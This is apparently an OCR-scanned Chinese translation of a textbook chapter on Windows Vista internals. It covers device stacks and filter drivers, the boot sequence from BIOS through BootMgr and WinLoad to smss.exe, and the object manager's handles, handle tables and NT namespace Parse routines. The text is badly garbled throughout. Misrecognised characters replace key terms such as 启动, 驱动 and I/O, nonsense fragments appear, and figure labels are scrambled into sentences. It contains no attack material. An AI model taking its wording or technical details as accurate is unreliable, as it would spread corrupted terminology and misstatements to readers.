为 内 核 态 的 一 般 可 扩展 性 的 机 制 。 如 上 所 述 ， 大 部 分 的 Win32 子 系统 是 
作为 一 个 驱动 程序 被 加 载 。 


LO 管理 右 组 织 的 数据 按照 一 是 的 路 线 流 经 过 每 个 设备 实例 ， 如 图 
11-16。 这 个 路 线 称 为 设备 栈 ， 由 分 配 到 这 条 路 线 上 的 内 核 设 备 对 象 的 
私有 实例 组 成 。 设 备 堆栈 中 的 每 个 设备 对 象 与 特定 的 驱动 程序 对 象 相 
关联， 其 中 包含 日 第 使 用 的 VO 请 求 的 数据 包 流 经 该 设备 堆栈 的 表 。 在 
某 些 情况 下 ， 堆 栈 中 的 设备 驱动 程序 表示 其 唯一 的 目的 古 在 某 一 特定 
的 设备 上 过 滤 1O 操 作 目 标 、 总 线 或 网 络 驱 动 融 。 过 滤 右 的 使 用 是 有 一 
些 原因 的 。 有 时 预 处 理 或 后 处 理 MO 操 作 可 以 得 到 更 清晰 的 架构 ， 而 其 
他 时 候 只 是 以 实用 为 出 发 已 ， 因 为 没有 修改 张 动 的 来 源 和 权限 ， 过 滤 
器 是 用 来 解决 这 个 问题 的 。 过 滤器 还 可 以 全 面 执行 新 的 功能 ， 如 把 磁 
盘 分 区 或 多 个 磁盘 分 成 RAID 眷 。 
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磁盘 类 驱动 程序 
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磁盘 微型 端口 驱动 


设备 栈 由 设备 对 每 一 个 设备 对 象 都 链接 ” ”设备 栈 由 设备 对 象 组 
象 组 成 ， 比 如 : C 着 带 有 入 口 点 的 驱动 对 象 ” 成， 比如: D 
图 11-16 简单 描绘 两 个 NTFS 文 件 卷 的 设备 栈 。IO 请 求 包 由 上 往 下 
通过 栈 。 每 一 级 堆栈 中 的 相关 驱动 中 的 适当 程序 被 调用 。 该 设备 栈 由 
分 配给 每 个 堆栈 的 设备 对 象 组 成 


文件 系统 作为 驱动 程序 被 加 载 。 每 个 文件 系统 卷 的 实例 ， 有 一 个 
设备 对 象 创建 ， 并 作为 该 设备 堆栈 卷 的 一 部 分 。 这 是 设备 对 象 将 与 驱 
动 对 象 的 文件 系统 适当 的 卷 格式 发 生 关 联 。 特 别 过 滤 驱 动 程序 ， 称 为 
文件 系统 过 滤 驱 动 程序 ， 可 以 在 插入 设备 对 象 之 前 ， 文 件 系 统 设备 对 


象 将 功能 应 用 于 被 发 送 到 每 个 卷 的 O 请 求 ， 如 数据 读 取 或 写 入 的 病毒 


检查 。 


网 络 协议 也 作为 使 用 WO 模型 的 驱动 被 装载 起 来 ， 例 如 Windows 
Vista 整 合 的 IPv4/IPv6 TCP/IP 实 现 。 对 于 老 的 基于 MS-DOS 的 Windows 
操作 系统 ，TCP/IP 驱 动 实现 了 一 个 特殊 的 Windows W/O 模型 网 络 接口 上 
的 协议 。 还 有 其 他 一 些 驱 动 也 执行 这 样 的 安排 ， 其 中 的 Windows 小 型 端 
口 。 共 享 功能 是 在 一 个 类 驱动 程序 中 。 例 如 ，SCSI 或 IDE 人 磁盘 或 USB 设 
备 通用 功能 是 作为 一 类 驱动 提供 的 ， 这 一 类 驱动 为 这 些 设备 的 每 个 特 
定 类 型 提供 微 端 口 驱 动 程序 连接 为 一 个 库 。 


我 们 在 本 章 不 讨论 任何 特定 的 设备 驱动 ， 但 是 在 11.7 节 中 将 更 为 详 
细 地 介绍 有 关 IO 管 理 夯 如 何 与 设备 驱动 互动 。 


11.3.2 ”局 动 Windows Vista 


使 用 操作 系统 需要 运行 几 个 步骤 。 当 电脑 打开 时 ，CPU 初 始 化 硬 
件 。 然 后 开始 执行 内 存 中 的 一 个 程序 。 但 是 ， 唯 一 可 用 的 代码 是 由 计 
算 机 制造 商 初始 化 的 某 些 非 易 失 性 的 CMOS 内 存 形式 (有 时 被 用 户 更 
新 ， 在 一 个 进程 中 称 为 闪存) 。 在 大 多 数 PC 机 中 ， 最 初 的 初始 化 程序 
是 BIOS 〈 基 本 输入 /输出 系统 ) ， 它 知道 如 何在 一 台 PC 机 上 找到 设备 
的 标准 类 型 。BIOS 提 供 了 Windows Vista 在 磁盘 驱动 器 分 区 开始 时 首先 
装载 的 小 引导 程序 。 


引导 程序 知道 如 何在 根 目录 的 文件 系统 卷 之 外 阅读 足够 的 信息 去 
发 现 独 立 的 Windows BootMgr 程 序 。BootMgr 确 定 系 统 是 否 已 经 处 于 体 
眼 或 待机 模式 (特别 省 电 模 式 ， 系 统 不 需要 重启 就 可 以 重新 打开 ) 。 
如 果 是 ，BootMgr 加 载 和 执行 WinResume.exe。 否 则 加 载 和 执行 
WinLoad.exe 执 行 新 的 启动 。WinLoad 加 载 系统 启动 组 件 到 内 存 中 : 内 
核 /执行 体 (通常 是 Ntoskrnl.exe)、HAL(hal.dll)， 该 文件 包含 系统 储 梨 ， 
Win32k.sys 张 动 包含 win32 子 系统 的 内 核 态 部 分 ， 以 及 任何 其 他 在 系统 
储 桌 中 作为 启动 驱动 程序 列 出 的 驱动 程序 的 镜像 ， 这 就 意味 着 在 系统 
启动 时 ， 它 们 是 必需 的 。 


一 旦 Windows 启 动 组 件 加 载 到 内 存 中 ， 控 制 就 转移 给 NTOS 中 的 低 
级 代码 ， 来 完成 初始 化 HAL、 内 核 和 执行 体 、 链 接 驱 动 像 、 访 问 /更 新 
系统 配置 中 的 数据 等 操作 。 所 有 内 核 态 的 组 件 初始 化 后 ， 第 一 个 用 户 
态 进 程 被 创建 ， 使 用 运行 着 的 smss.exe 程 序 (如 同 UNIX 系 统 
的 /etc/init) ° 


Windows 局 动 程序 在 直到 系统 局 动 失败 时 ， 有 专门 处 理 和 常用 问题 
的 逻辑 。 有 时 安装 一 个 坏 的 设备 驱动 程序 ， 或 运行 一 个 像 注册 表 一 样 
的 程序 \ 能 导致 系统 储 时 损坏 ) ， 会 阻止 系统 正常 启动 。 系 统 提 供 了 
一 种 功能 来 文 持 忽略 最 近 的 变化 并 局 动 到 最 近 一 次 的 系统 正确 配置 。 
其 他 局 动 选项 包括 安全 局 动 ， 它 关闭 了 许多 可 选 的 弛 动 程序 。 还 有 故 
障 恢 复 控制 台 ， 局 动 cmd.exe 命 令 行 窗口 ， 它 提供 了 一 个 类 似 UNIX 的 
HAA AS ° 


男 一 个 常见 的 问题 ， 用 户 认为 ， 一 些 Windows 系 统 偶尔 看 起 来 很 
不 可 思议 ， 经 常 有 系统 和 应 用 程序 的 (看 似 随机 ) 月 演 。 从 微软 的 在 
线 崩 涡 分 析 程 序 得 到 的 数据 ， 提 供 了 许多 衣 江 是 由 于 物理 内 存 损坏 导 
致 的 证 据 。 所 以 Windows Vista 局 动 进程 提供 了 一 个 运行 广义 上 的 内 存 
诊断 的 选项 。 也 许 未 来 的 PC 硬件 将 普遍 支持 ECC (或 者 部 分 NF, 
但 是 今天 的 大 多 数 人 台式 机 和 笔记 本 电脑 系统 很 容易 受到 攻击 ， 即 便 是 
在 它们 所 包含 的 数 十 亿 比 特 的 内 存 中 的 单 比特 错误 。 


11.3.3 “对象 管理 希 的 实现 


对 象 管理 需 也 许 是 windows 可 执行 过 程 中 一 个 最 重要 的 组 件 ， 这 也 
是 为 什么 我 们 已 经 介绍 了 它 的 许多 概念 。 如 前 所 述 ， 它 提供 了 一 个 统 
一 的 和 一 致 的 接口 ， 用 于 管理 系统 资源 和 数据 结构 ， 如 打开 文件 、 进 
程 、 线 程 、 内 存 部 分 、 定 时 器 、 设 备 、 驱 动 程序 和 信号 。 更 为 特殊 的 
对 和 象 可 以 表示 一 些 事 物 ， 像 内 核 的 事务 、 外 形 、 安 全 令 牌 和 由 对 象 管 
理 絮 管理 的 Win32 桌 面 。 设 备 对 象 和 LO 系统 的 插 述 联系 在 一 起 ， 包 括 
提供 NT 名 字 空 间 和 文件 系统 卷 之 间 的 链接 。 配 置 管理 器 使 用 一 个 Key 
类 型 的 对 象 与 注册 配置 相 链 接 。 对 象 管理 器 自身 有 一 些 对 象 ， 它 用 于 
管理 NT 名 字 空 间 和 使 用 公共 功能 来 实现 对 象 。 在 这 些 目录 中 ， 有 象征 
性 的 联系 和 对 象 类 型 的 对 象 。 


由 对 象 管理 器 提供 的 统一 性 有 不 同 的 方面 。 所 有 这 些 对 象 使 用 相 
同 的 机 制 ， 包 括 它们 是 如 何 创 建 、 销 毁 以 及 定额 分 配 值 的 占有 。 它 们 
都 可 以 被 用 户 态 进程 通过 使 用 句柄 访问 。 在 内 核 的 对 象 上 有 一 个 统一 
的 协议 管理 指针 的 引用 。 对 象 可 以 从 NT 的 名 字 空 间 ( 由 对 象 管 理 器 管 
理 ) 中 得 到 名 字 。 调度 对 象 (那些 以 信号 事件 相关 的 共同 数据 结构 开始 
的 对 象 ) 可 以 使 用 共同 的 同步 和 通知 接口 ， 如 WaitForMultipleObjects。 
有 一 个 共同 的 安全 系统 ， 其 执行 了 以 名 称 来 访问 的 对 象 的 ACL， 并 检 


查 每 个 使 用 的 句柄 。 甚 至 有 工具 帮助 内 核 态 开发 者 ， 在 使 用 对 象 的 过 
程 中 奶 踩 调试 问题 。 


理解 对 象 的 关键 ， 是 要 意识 到 一 个 (执行) 对象 仅仅 是 内 核 态 下 
在 虚拟 内 存 中 可 以 访问 的 一 个 数据 结构 。 这 些 数据 结构 ， 常 用 来 代表 
更 抽象 的 概念 。 例 如 ， 执 行文 件 对 象 会 为 那些 已 打开 的 系统 文件 的 每 
一 个 实例 而 创建 。 进 程 对 象 被 创建 来 代表 每 一 个 进程 。 


一 种 事实 上 的 结果 和 是， 对象 只 是 内 核 数据 结构 ， 当 系统 重新 启动 
时 (或 崩溃 时 ) 所 有 的 对 象 都 将 丢失 。 当 系统 启动 时 ， 没 有 对 象 存 
在 ， 甚 至 没有 对 象 类 型 描述 。 所 有 对 象 类 型 和 对 象 上 自身 ， 由 对 象 管理 
器 提供 接口 的 执行 体 的 其 他 组 件 动态 创建 。 当 对 象 被 创建 并 指定 一 个 
名 字 ， 它 们 可 以 在 以 后 通过 NT 名 字 空 间 补 引用。 因此， 建立 对 和 象 的 系 
统 根 目录 还 建立 了 NT 名 字 空 间 。 


对 象 结构 ， 如 图 11-17 所 示 。 每 个 对 和 象 包含 一 个 对 所 有 类 型 的 所 有 
对 象 的 某 些 共性 信息 头 。 在 这 个 头 的 领域 内 包括 在 名 字 空 间 内 的 对 象 
的 名 称 ， 对 象 目录 ， 并 指向 安全 描述 符 代表 的 ACL 对 和 象 。 


对 象 数据 


open 方 法 
close 方 法 

Delete 方 法 
Querty name 方 法 
Parse 方 法 
Security 方 法 


图 11-17 对 象 管理 器 管理 的 执行 体 对 象 的 结构 


对 象 的 内 存 分 配 来 自由 执行 体 保持 的 两 个 堆 (或 池 ) 的 内 存 之 
一 。 在 有 ( 像 内 存 分 配 ， 效 用 函数 的 执行 体 中 ， 人 允许 内 核 态 组 件 不 仅 
分 配 分 页 内 核 内 存 ， 也 分 配 无 分 页 内 核 内 存 。 对 于 那些 需要 被 具有 
CPU 2 级 以 及 更 高 优先 级 的 对 象 访问 的 任何 数据 结构 和 内 核 态 是 对 象 ， 
无 分 页 内 存 都 是 需要 的 。 这 包括 ISR 和 DPC (但 不 包括 APC) 和 线程 调 
度 本 号。 该 pagefault 处 理 也 需要 由 无 分 页 内 核 内 存 分 配 的 数据 结构 ， 以 
避免 递归 。 


大 部 分 来 和 目 内 核 堆 管理 器 的 分 配 ， 是 通过 使 用 每 个 处 理 器 后 备 名 
单 来 获得 的 ， 这 个 后 备 名 单 中 包含 分 配 大 小 一 致 的 LIFO 列 表 。 这 些 
LIFO 优 化 不 涉及 锁 的 运作 ， 可 提高 系统 的 性 能 和 可 扩展 性 。 


每 个 对 象 标 头 包含 一 个 配额 字段 ， 这 是 用 于 对 进程 访问 一 个 对 象 
的 配额 征收 。 配 额 是 用 来 保持 用 户 使 用 较 多 的 系统 资源 。 对 无 分 页 核 
心 内 存 (这 需要 分 配 物 理 内 存 和 内 核 虚 拟 地 址 ) 和 分 页 的 核心 内 存 
(使 用 了 内 核 虚 拟 地 址 ) 有 不 同 的 限制 。 当 内 存 类 型 的 累积 费用 达到 
了 配额 限制 ， 由 于 资源 不 足 而 导致 给 该 进程 的 分 配 失败 。 内 存 管理 器 
也 正在 使 用 配额 来 控制 工作 集 的 大 小 和 线程 管理 硕 ， 以 限制 CPU 的 使 
FAS 


物理 内 存 和 内 核 虚 拟 地 址 都 是 宝贵 的 资源 。 当 一 个 对 象 不 再 需 
要 ， 应 该 取消 并 回收 它 的 内 存 和 地 址 。 但 是 ， 如 果 一 个 仍 在 被 使 用 的 
对 象 收 到 新 的 请 求 ， 则 内 存 可 以 被 分 配给 男 一 个 对 象 ， 然 而 数据 结构 
有 可 能 被 损坏 。 在 Windows 执 行 体 中 可 以 很 容易 发 生 这 样 的 问题 ， 因 为 
它 是 高 度 多 线程 的 ， 并 实施 了 许多 异步 操作 〈 例 如 ， 在 完成 特定 数据 
结构 之 上 的 操作 之 前 ， 就 返回 这 些 数 据 结构 传递 给 函数 的 调用 者 ) 。 


为 了 避免 由 于 竞争 条 件 而 过 早 地 释放 对 象 ， 对 象 管理 器 实现 了 一 
个 引用 计数 机 制 ， 以 及 引用 指针 的 概念 。 需 要 一 个 参考 指针 来 访问 一 
个 对 象 ， 即 便 是 在 该 物体 有 可 能 正 要 被 删除 时 。 根 据 每 一 个 特定 对 象 
类 型 有 关 的 协议 里 面 ， 只 有 在 某 些 时 候 一 个 对 象 才 可 以 被 另 一 个 线程 
删除 。 在 其 他 时 间 使 用 的 锁 ， 数 据 结构 之 间 的 依赖 关系 ， 甚 至 是 没有 
其 他 线程 有 一 个 对 象 的 指针 ， 这 些 都 能 够 充分 保护 一 个 对 象 ， 使 其 避 
免 被 过 早 删 除 。 


1. 句 柄 


用 户 态 提 到 内 核 态 对 象 不 能 使 用 指针 ， 因 为 它们 很 难 验 证 。 相 反 
内 核 仿 对 象 必须 使 用 一 些 其 他 方式 命名 ， 使 用 户 代 码 可 以 引用 它们 。 
Windows 使 用 句柄 来 引用 内 核 态 对 象 。 句 柄 是 不 透明 值 (opaque 
value) ， 该 不 透明 值 是 被 对 象 管理 器 转换 到 具体 的 应 用 ， 以 表示 一 个 
对 象 的 内 核 态 数 据 结构 。 图 11-18 表 示 了 用 来 把 句柄 转换 成 对 象 的 指针 
的 句柄 表 的 数据 结构 。 句 柄 表 增 加 额外 的 间接 层 来 扩展 。 每 个 进程 都 
有 目 己 的 表 ， 包 括 该 系统 的 进程 ， 其 中 包含 那些 只 含有 内 核 线程 与 用 
户 态 进程 不 相关 的 进程 。 


句柄 描述 符 A: 句 柄 表 入 口 S12 


图 11-18 使 用 一 个 单独 页 达到 512 个 句柄 的 最 小 表 的 句柄 表 数 据 结构 


图 11-19 显 示 ， 句 柄 表 最 大 文 持 两 个 额外 的 间接 层 。 这 使 得 在 内 核 
态 中 执行 代码 能 够 方便 地 使 用 句柄 ， 而 不 是 引用 指针 。 内 核 句 柄 都 是 
经 过 特殊 编码 的 ， 从 而 它们 能 够 与 用 户 仿 的 句柄 区 分 开 。 内核 句 栅 都 


保存 在 系统 进程 的 句柄 表 里 ， 而 且 不 能 以 用 户 态 存 取 。 就 像 大 部 分 内 
核 虚 拟 地 址 空间 被 所 有 进程 共享 ， 系 统 句 柄 表 由 所 有 的 内 核 成 分 共 
享 ， 无论 当前 的 用 户 态 进程 是 什么 。 


句柄 表 描 述 符 D: 句 柄 表 入 口 [32] 
二 
B: 句 柄 表 入 口 [1024] 


ETT) | Estee 1024) 
A: 句 柄 表 入 口 [512] 有 


TTT F: 句 柄 表 入 口 [512] 
= Wn 
对 象 ] oR 要 入 口 [512] 
JH 


图 11-19 最 多 达到 1600 万 个 句柄 的 句柄 表 数 据 结构 


用 户 可 以 通过 Win32 调 用 的 CreateSemaphore 或 OpenSemaphore 来 创 
建新 的 对 象 或 打开 一 个 已 经 存在 的 对 象 。 这 些 都 是 对 程序 库 的 调用 ， 
并 且 最 后 会 转向 适当 的 系统 调用 。 任 何 成 功 创建 或 打开 对 象 的 指令 的 
结果 ， 都 是 储存 在 内 核 内 存 的 进程 私有 人 句柄 表 的 一 个 64 位 句柄 表 入 
口 。 表 中 句柄 逻辑 位 置 的 32 位 索引 返回 给 用 户 用 于 随后 的 指令 。 内 核 
的 64 位 句柄 表 入 口 包含 两 个 32 位 字 节 。 一 个 字 节 包含 29 位 指针 指向 包 
头 。 其 后 的 3 位 作为 标志 〈 例 如 ， 表 示 句 柄 是 否 被 它 创 建 的 进程 继 
承 ) 。 这 3 位 在 指针 就 位 以 前 是 被 屏蔽 掉 的 。 其 他 的 字 节 包含 一 个 32 位 


正确 掩 码 。 这 是 必需 的 因为 只 有 在 对 象 创建 或 打开 的 时 候 许 可 校 验 才 
会 进行 。 如 果 一 个 进程 对 某 对 象 只 有 只 读 的 权限 ， 那 在 表示 其 他 在 掩 
码 中 的 权限 位 都 为 0%， 从 而 让 操作 系统 可 以 拒绝 除 读 之 外 对 对 和 象 进行 任 
何其 他 的 操作 。 


2. 对 象 名 字 空 间 


进程 可 以 通过 由 一 个 进程 把 到 对 象 的 句柄 复制 给 其 他 进程 来 共 诗 
对 象 。 但 是 这 需要 复制 的 进程 有 到 其 他 进程 的 句柄 ， 而 这 样 在 多 数 情 
况 中 并 不 适用 ， 例 如 进程 共享 的 对 象 是 无 关 的 或 被 其 他 进程 保护 的 。 
在 其 他 情况 下 ， 对 象 即使 在 不 被 任何 进程 调用 的 时 候 仍然 保持 存在 是 
非常 重要 的 ， 例 如 表示 物理 设备 的 对 象 ， 或 用 户 实现 对 象 管理 器 和 它 
自己 的 NT 名 字 空 间 的 对 象 。 为 了 地 址 的 全 面 分 享 和 持久 化 需求 ， 对 象 
管理 允许 随意 的 对 象 在 被 创建 的 时 候 束 给 定 其 NT 名 字 空 间 中 的 名 字 。 
然而 ， 是 由 执行 部 件 控 制 特定 类 型 的 对 象 来 提供 接口 ， 以 使 用 对 象 管 
Phar) an ADRE ° 


NT 名 字 空 间 是 分 级 的 ， 借 由 对 象 管理 器 实现 目录 和 特征 连接 。 名 
字 空 间 也 是 可 扩展 的 ， 通 过 提供 一 个 叫做 Parse 的 进程 程序 允许 任何 对 
象 类 型 指定 名 字 空 间 扩展 。Parse 程 序 是 一 个 可 以 提供 给 每 一 个 对 象 类 
型 的 对 象 创建 时 使 用 的 程序 ， 如 图 11-20 所 示 。 


C Orn | TTT 
用 于 扩展 名 字 空 间 的 对 象 类 型 用 于 文件 和 档案 密 钥 

最 后 句柄 关闭 清除 可 见 结果 

最 后 一 个 指针 撤销 对 象 将 被 删除 

得 到 或 设置 对 象 的 安全 描述 符 
全 到 六 多 和 


图 11-20 用 于 指定 一 个 者 对象 类 型 的 对 象 语句 


而 三 


Open 语 句 很 少 使 用 ， 因 为 默认 对 象 管理 器 的 行为 才 是 必需 的 ， 所 
以 程序 为 所 有 基本 对 象 类 型 指定 为 NULL ° 


Close 和 Delete 语 句 描述 对 象 完 成 的 不 同 阶段 。 当 对 象 的 最 后 一 个 
句柄 关闭 ， 可 能 会 有 必要 的 动作 清空 状态 ， 这 些 由 Close 语 句 来 执行 ， 
当 最 后 的 指针 参考 从 对 象 移 除 ， 使 用 Delete 语 句 ， 从 而 对 象 可 以 准备 被 
删除 并 使 其 内 存 可 以 重用 。 利 用 文件 对 象 ， 这 两 个 语句 都 实现 为 WO 管 
理 器 里 面 的 回调 ，1/O 管 理 器 是 声明 了 对 象 类 型 的 组 件 。 对 象 管理 操作 
使 得 由 设备 堆栈 发 送 的 MO 操作 能 够 与 文件 对 象 关 联 上 ， 而 大 多 数 这 些 
工作 由 文件 系统 完成 。 


Parse 语 句 用 来 打开 或 创建 对 象 ， 如 文件 和 登录 密码 ， 以 及 扩展 NT 
名 字 空 间 。 当 对 象 管理 右 试 图 通过 名 称 打 开 一 个 对 和 象 并 遭遇 其 管理 的 
名 字 空 间 树 的 叶 结 点 ， 它 检查 该 叶 结 点 对 象 类 型 是 否 指定 了 一 个 Parse 
语句 。 如 果 有 ， 它 会 引用 该 语句 ， 将 路 径 名 中 未 用 的 部 分 传 给 它 。 再 
以 文件 对 象 为 例 ， 叶 子 结 点 是 一 个 表现 特定 文件 系统 卷 的 设备 对 象 。 


Parse 语 句 由 LO 管理 器 执行 ， 并 发 起 在 对 文件 系统 的 VO 操作 ， 以 填充 一 
个 指向 文件 的 公开 实例 到 该 文件 对 象 ， 这 个 文件 是 由 路 径 名 指定 的 。 
我 们 将 在 以 后 逐步 探索 这 个 特殊 的 实例 。 


QueryName 语 句 是 用 来 查找 与 对 象 关 联 的 名 字 。 Security 语 句 用 于 
得 到 、 设 置 或 删除 该 安全 描述 符 的 对 象 。 对 于 大 多 数 类 型 的 对 象 ， 此 
程序 在 执行 的 安全 引用 监视 器 组 件 里 提供 一 个 标准 的 切入 点 。 


注意 ， 在 图 11-20 里 的 语句 并 不 执行 每 种 对 象 类 型 最 感 兴趣 的 操 
作 。 相 反 ， 这 些 程序 提供 给 对 象 管理 器 正 确实 现 功 能 所 需要 的 回调 函 
数 ， 如 提供 对 对 象 的 访问 和 对 象 完成 时 的 清理 工作 。 除 了 这 些 回调 ， 
对 象 管理 器 还 提供 了 一 套 通 用 对 象 例 程 ， 例 如 创建 对 象 和 对 象 类 型 ， 
复制 句柄 ， 从 句柄 或 者 名 字 获 得 引用 指针 ， 并 增加 和 诚 去 对 象 头 部 的 
参考 计数 。 


对 象 感 兴趣 的 操作 都 是 在 本 地 NT API 系 统 调用 ， 如 
NtCresteProcess、NtCreateFile 或 NtClose (关闭 句柄 所 有 类 型 的 通用 操 
YE) ， 如 图 11-9 所 示 。 


虽然 对 象 名 字 空 间 对 整个 运作 的 系统 是 至 关 重 要 的 ， 但 却 很 少 
人 知道 它 的 存在 ， 因 为 没有 特殊 的 浏览 工具 的 话 它 对 用 户 是 不 可 见 
的 。winobj 束 是 一 个 这 样 的 浏 咒 工 具 ， 在 


www.microsoft.comy/technet/sysinternals 可 免费 获得 。 在 运行 时 ， 此 工具 


描绘 的 对 象 的 名 字 空 间 通 常 包 含 对 象 目录 ， 如 图 11-21 列 出 来 的 及 其 他 


— JHE o 


内 容 


查找 类 似 C: 的 MS-DOS 设 备 的 查找 起 始 位 置 
HR? 

所 有 1/O 设 备 
每 个 加 载 的 设备 驱动 对 应 的 对 象 
如 图 11-22 中 列 出 的 类 型 的 对 象 


DosDevices 


Device 
Driver 
ObjectTypes 


Windows 发 送 消息 到 所 有 Win32 GUI 窗口 的 对 象 


用 户 创建 的 Win32 对 象 ， 如 信和 号 量 、 互 斥 量 等 
由 启动 装载 器 发 现 的 分 区 名 称 

National 语 言 支持 对 象 
文件 系统 驱动 对 象 和 文件 系统 识别 对 象 
安全 系统 的 对 象 


BaseNamedObjects 
Arcname 
NLS 
FileSystem 
Security 


KnownDLLs 较 早 开启 和 一 直 开 启 的 关键 共享 库 


图 11-21 在 对 象 名 字 空 间 中 的 一 些 典 型 目 邓 


一 个 被 奇怪 地 命名 为 \?? 的 目录 包含 用 户 的 所 有 MS-DOS 类 型 的 设 
备 名 称 ， 如 A: 表示 软驱 ，C: 表示 第 一 块 硬盘 。 这 些 名 称 其 实 是 在 设 
备 对 象 活跃 的 地 方 链 接 到 目录 \ 装 置 的 符号 。 使 用 名 称 \?? 是 因为 其 按 字 
母 顺序 排列 第 一 ， 以 加 快 查询 从 驱动 器 盘 符 开始 的 所 有 路 径 名 称 。 其 
他 的 对 象 目录 的 内 容 应 该 是 自 解 释 的 。 


如 上 所 述 ， 对 象 管理 器 保持 一 个 单独 的 句柄 为 每 个 对 象 计数 。 这 
个 计数 是 从 来 不 会 大 于 指针 引用 计数 ， 因 为 每 个 有 效 的 句柄 对 象 在 它 
的 句柄 表 入 口 有 一 个 引用 指针 。 使 用 单独 句柄 计数 的 理由 是 ， 当 最 后 


一 个 用 户 态 的 引用 消失 的 时 候 ， 许 多 类 型 的 对 象 可 能 需要 清理 自己 的 
状态 ， 尽 管 它 们 尚未 准备 好 让 它们 的 内 存 删除 。 


以 一 个 文件 对 象 为 例 表示 一 个 打开 文件 的 实例 。Windows 系 统 中 文 
件 被 打开 以 供 独 占 访 问 。 当 文件 对 象 的 最 后 一 个 句柄 被 关闭 ， 重 要 的 
苹 在 那 一 刻 束 应 该 删除 专 有 访问 ， 而 不 古 等 待 任何 内 核 引 用 最 终 消 失 
(例如 ， 在 最 后 一 次 从 内 存 冲 洗 数 据 之 后 。) 否则 ， 从 用 户 态 关闭 并 
重新 打开 一 个 文件 可 能 无 法 按 预 期 的 方式 工作 ， 因 为 该 文件 看 来 仍然 
FEE ® 


虽然 对 象 管理 器 在 内 核 具 有 全 面 的 管理 机 制 来 管理 内 核 中 的 对 象 
生命 周期 ， 不 论 是 NT API 或 Win32API 的 都 没有 提供 一 个 引用 机 制 来 处 
理 在 用 户 态 的 并 行 多 线程 之 间 的 句柄 使 用 。 从 而 多 线程 并 发 访问 句柄 
会 带 来 竞争 条 件 (race condition) 和 bug， 例 如 ， 可 能 发 生 一 个 线程 在 
别 的 线程 使 用 完 特定 的 句柄 之 前 就 把 它 关 闭 了 。 或 者 多 次 关闭 一 个 名 
柄 。 或 者 关闭 另 一 个 线程 仍然 在 使 用 的 句柄 ， 然 后 重新 打开 它 指向 不 
同 的 对 象 。 


也 许 Windows 的 API 应 该 被 设计 为 每 个 类 型 对 象 带 有 一 个 关闭 
API， 而 不 是 单一 的 通用 NTClose 操 作 。 这 将 至 少 会 减少 由 于 用 户 态 线 
程 关闭 了 错误 的 处 理 而 发 生 错 误 的 频率 。 另 一 个 解决 办 法 可 能 是 在 名 
柄 表 中 的 指针 之 外 再 添加 一 个 序列 域 。 


为 了 帮助 程序 开发 人 员 在 他 们 的 程序 中 寻找 这 些 类 似 的 问题 ， 
Windows 有 一 个 应 用 程序 验证 ， 软 件 开发 商 能 够 从 Microsoft 下 载 。 我 们 
将 在 11.7 市 介绍 类 似 的 驱动 程序 的 验证 右 ， 应 用 程序 验证 句 通 过 大 量 的 
规则 检查 来 帮助 程序 员 寻 找 可 能 通过 普通 测试 无 法 发 现 的 错误 。 它 也 
可 以 为 句柄 释放 列表 启用 先进 先 出 顺序 ， 以 便 句 柄 不 会 被 立即 重用 
( 即 关闭 句柄 表 通 党 采用 效果 较 好 的 LIFO 排 序 ) 。 防 止 句柄 被 立即 重 
用 的 情况 发 生 ， 在 这 些 转 化 的 情况 下 操作 可 能 错误 地 使 用 一 个 已 经 天 
闭 的 句柄 ， 这 是 很 容易 检测 到 的 。 


该 设备 对 象 是 执行 体 中 一 个 最 重要 的 和 贯穿 内 核 态 的 对 象 。 该 类 
型 是 由 IO 管理 器 指定 的 ，IO 管 理 器 和 设备 张 动 是 设备 对 象 的 主要 使 用 
者 。 设 备 对 象 和 驱动 程序 是 密切 相关 的 ， 每 个 设备 对 象 通常 有 一 个 链 
接 指 同 一 个 特定 的 驱动 程序 对 象 ， 它 描述 了 如 何 访 问 设备 驱动 程序 所 
对 应 的 MO 处 理 例 程 。 


设备 对 象 代表 硬件 设备 、 接 口 和 总 线 ， 以 及 逻辑 磁盘 分 区 、 磁 强 
卷 其 至 文件 系统 、 扩 展 内 核 ， 例 如 防 病毒 过 滤器 。 许 多 设备 驱动 程序 
都 有 给 定 的 名 称 ， 这 样 就 可 以 访问 它们 ， 而 无 需 打开 设备 的 实例 的 句 
柄 ， 如 在 UNIX 中 。 我 们 将 利用 设备 对 象 以 说 明 Parse 程 序 是 如 何 被 使 用 
的 ， 如 图 11-22 所 示 。 
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; DEVICE OBJECT: ; 
: for C: Volume : 
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loCompleteRequest 


: SYMLINK: 


图 11-22 IO 和 对 象 管理 器 创建 /打开 文件 并 返回 文件 句柄 的 步骤 


1) 当 一 个 执行 组 件 ， 如 实现 了 本 地 系统 调用 NTCreateFile 的 WO 管理 
弹 ， 在 对 象 管理 器 中 称 之 为 ODbOpenObjectByName， 它 发 送 一 个 NT 名 


字 空 间 的 Unicode 路 径 名 ， 例 如 \??AC:foovbar ° 


2) 对 象 管理 器 通过 目录 和 符号 链接 表 搜 索 并 最 终 认 定 \??\C: 指 的 是 
设备 对 象 (IO 管理 器 定义 的 一 个 类 型 ) 。 该 设备 对 象 在 由 对 象 管理 器 
管理 的 NT 名 字 空 间 中 一 个 叶 节 点 。 


3) 然 后 对 象 管理 器 为 该 对 象 类 型 调用 Parse 程 序 ， 这 恰好 是 由 LIO 管 
理 器 实现 的 lopParseDevice。 它 不 仅 传递 一 个 指针 给 它 发 现 的 设备 对 和 象 
(C: ) ， 而 且 还 把 剩 下 的 字符 串 \foovbar 也 发 送 过 去 。 


4)IO 管 理 器 将 创建 一 个 IRP (VOIR) ， 分 配 一 个 文件 对 象 ， 
发 送 请 求 到 由 对 象 管理 器 确定 的 设备 对 象 发 现 的 MO 设备 堆栈 。 


5)IRP 是 在 IO 堆栈 中 逐 级 传递 ， 直 到 它 到 达 一 个 代表 文件 系统 C: 
实例 的 设备 对 象 。 在 每 一 个 阶段 ， 欣 制 是 通过 一 个 与 这 一 等 级 设备 对 
象 相连 的 切入 点 传递 到 驱动 对 象 内 部 。 切 入 点 用 在 这 种 情况 下 ， 是 为 
了 支持 CREATE 操 作 ， 因 为 要 求 是 创建 或 打开 一 个 名 为 \foo\bar 的 文 
ae 


6) 该 设备 对 象 中 遇 到 指向 文件 系统 的 IRP 可 以 表示 为 文件 系统 筛选 
驱动 程序 ， 这 可 能 在 该 操作 到 达 对 应 的 文件 系统 设备 对 象 之 前 修改 MO 
操作 。 通 前 情况 下 这 些 中 间 设 备 代 表 系 统 扩 展 ， 例 如 反 病 毒 过 滤器 。 


7) 文 件 系 统 设备 对 象 有 一 个 链接 到 文件 系统 驱动 程序 对 象 ， 叫 
